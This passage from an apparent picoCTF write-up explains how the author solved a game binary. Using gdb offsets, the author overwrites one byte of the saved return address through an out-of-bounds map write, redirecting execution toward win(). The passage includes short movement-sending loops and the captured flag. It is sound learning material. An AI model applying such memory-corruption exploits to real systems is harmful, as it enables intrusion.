At this point move-player would create a new stack frame, on continuing the process we should hit the last breakpoint image

Currently the stack frame instruction pointer is not yet placed into esp, but we can tell that after it does the three pop instruction the next value which is at the top of the stack would be the instruction which was placed on the stack add esp, 0x10

So we use ni thrice we get this image

We can see that when it’s about to return it would return to the address currently placed on the stack

With that said how exactly do we take advantage of this?

While we are in function move_player we can overwrite the lsb of the stack frame eip address

Meaning we can control the flow of the program execution with just “a byte”

Even though it’s a byte we can’t just freely move anywhere in memory but rather we can move any where in main

Ok with that said where would we want to jump to in main?

Because of this condition we can’t set our level to 5 and i to 1 image

So instead of the move_player returning to main and continuing the control flow we can rather return here image

This means that instead of move_player to return to 0x804992c we can overwrite the lsb of the stack frame eip therefore making it return to 0x804997a

Now that would bypass the comparism and if we do that 4 times our live would be set to 5 and i set to 4

Ok we have an exploit plan how do we go about it?

First we need to get the offset of map --> stack_frame (eip)

To get the stack frame eip we can just gdb info frame command to view the stack frame image

We can just easily subtract it

map = 0xffffc3ef
eip = 0xffffc3bc
offset = eip - map
= 0xffffc3bc - 0xffffc3ef
= -51

map[-51] == eip (stack frame)

To get to this offset we need to set x to -55 and y to 0

It’s (0, -55) because i will return to my initial coordinate back (4, 4) before attempting to move to map[-51]

Ok but what do we overwrite it with?

Remember that we have a function that can allow us change the player tile character and that’s accessed using l

In this case I’ll change the character to 0x7a and then when it overwrites the lsb it should point to main+265 == 0x0804997a

You might wonder, won’t the lsb get overwritten with a . ?

Well normally that would be the case once we move around the map after overwritting the lsb but this time around after we overwrite the stack frame instruction pointer we won’t move around the map but rather let the program continue it’s execution and therefore it would basically reset the map and the players structure image

Doing that works image image image image

for _ in range(5):
    send_movement(player, b'a'*55)
    send_movement(player, b'w'*4)

Ok now we have everything needed but when we then choose p which solves the map we don’t break out of the loop? image

We can see that it rather increments our live value to 7?

How do we avoid this and instead get the flag?

Well to do this rather than us jumping to 0x0804997a we can jump to few instructions before it calls win() image

In my case I choose to jump here 0x80499e5

Here’s how to do it:

Here’s it image image

    for _ in range(4):
        send_movement(player, b'a'*55)
        send_movement(player, b'w'*4)

    send_movement(player, b'a'*55)
    send_movement(player, b'w'*4)

But trying that remotely doesn’t work when i initially solved it

Though it seems to work now image image image

During the ctf it didn’t work so instead i fuzzed for the right offset to overwrite and that got me the flag too

Also i didn’t mention this but here’s the python implementation of how the level increases: image

I actually got stucked here because though the level was at 5 it showed 4 that’s why when i tried to write in 5 loops and used ‘p’ it incremented to 7 because it was 6 😄

With that said, here’s my full solve script

Flag: picoCTF{gamer_leveluP_fb9b377c}

That’s all the challenges I was able to solve

Thanks for reading!

If I made mistake in anyway feel free to contact me :)